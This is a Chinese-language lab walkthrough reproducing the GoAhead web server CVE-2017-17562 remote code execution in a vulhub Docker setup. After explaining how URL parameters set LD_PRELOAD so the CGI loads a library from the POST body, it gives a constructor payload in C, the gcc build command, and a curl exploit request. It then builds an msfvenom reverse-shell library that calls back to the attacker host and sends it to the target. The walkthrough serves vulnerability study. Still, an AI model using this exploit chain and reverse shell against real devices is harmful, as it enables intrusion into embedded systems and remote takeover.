漏洞描述
GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序,这个漏洞就出现在运行CGI程序的时候。
GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了REMOTE_HOST
和HTTP_AUTHORIZATION
。我们能够控制环境变量,就有很多攻击方式。比如在Linux中,LD_
开头的环境变量和动态链接库有关,如LD_PRELOAD
中指定的动态链接库,将会被自动加载;LD_LIBRARY_PATH
指定的路径,程序会去其中寻找动态链接库。
我们可以指定LD_PRELOAD=/proc/self/fd/0
,因为/proc/self/fd/0
是标准输入,而在CGI程序中,POST数据流即为标准输入流。我们编译一个动态链接库,将其放在POST Body中,发送给http://target/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0
,CGI就会加载我们发送的动态链接库,造成远程命令执行漏洞
安装https协议、CA证书、dirmngr
apt-get update
apt-get install -y apt-transport-https ca-certificates
apt-get install dirmngr
添加GPG密钥并添加更新源
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list
系统更新以及安装docker
apt-get update&&apt install docker-ce
启动docker服务器 和compose
service docker start || apt install docker-compose
下载安装vulhub
git clone https://github.com/vulhub/vulhub.git
漏洞复现
攻击:192.168.1.162
目标:192.168.1.240
启动环境/vulhub-master/goahead/CVE-2017-17562
docker-compose up -d
编译动态链接库
#include <unistd.h>
static void before_main(void) attribute((constructor));
static void before_main(void)
{
write(1, “Hello: World!\n”, 14);
}
gcc -shared -fPIC ./payload.c -o payload.so
curl -X POST --data-binary @payload.so "http://192.168.1.240:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i
Hello: world! 输出成功,说明动态链接库中的代码已被执行:
生成shell文件反弹
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.1.162 LPORT=9999 -f elf-so -o payload.so
再次使用post命令
curl -X POST --data-binary @payload.so "http://192.168.1.240:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i
参考链接
https://blog.csdn.net/Aesthetic99/article/details/12366362